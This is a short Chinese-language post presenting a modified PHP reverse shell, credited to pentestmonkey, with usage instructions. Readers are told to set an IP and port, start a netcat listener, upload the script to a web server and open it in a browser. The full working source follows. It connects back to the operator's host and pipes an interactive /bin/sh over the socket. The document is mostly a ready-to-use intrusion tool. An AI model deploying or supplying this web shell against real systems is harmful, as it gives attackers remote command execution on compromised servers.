php-reverse-shell

功能：

返回一个交互式的shell

使用：

先修改脚本中的两个变量 $ip 和 $port 为自己所需的。然后本地监听 $port 。例如：

$ip = '192.168.1.111'; // CHANGE THIS

$port = 13123; // CHANGE THIS

nc -v -l -p 13123

然后上传并在浏览器中打开该PHP脚本文件。

效果图：



源代码（在原文的基础进行了修改）：

<?php
set_time_limit (0);
$ip = "192.168.1.111";
$port = "13123";

$sock = fsockopen($ip, $port, $errno, $errstr, 30);
if (!$sock)
exit("$errstr ($errno)");

if(function_exists('proc_open')){
$descriptorspec = array(
0 => array("pipe", "r"),
1 => array("pipe", "w"),
2 => array("pipe", "w")
);
$process = proc_open("id;/bin/sh -i", $descriptorspec, $pipes);
if (!is_resource($process))
exit("ERROR: Can't reverse shell");

stream_set_blocking($pipes[0], 0);
stream_set_blocking($pipes[1], 0);
stream_set_blocking($pipes[2], 0);
stream_set_blocking($sock, 0);

print("Successfully opened reverse shell to $ip:$port");

while (1) {
if (feof($sock)) {
print("ERROR: Shell connection terminated");
break;
}

if (feof($pipes[1])) {
print("ERROR: Shell process terminated");
break;
}

$input = fread($sock, 1024);
fwrite($pipes[0], $input);

$output = fread($pipes[1], 1024);
fwrite($sock, $output);

$output = fread($pipes[2], 1024);
fwrite($sock, $output);
}
fclose($sock);
fclose($pipes[0]);
fclose($pipes[1]);
fclose($pipes[2]);
proc_close($process);
}
else print "function 'proc_open' is not exists.";
?>

原文：http://pentestmonkey.net/tools/web-shells/php-reverse-shell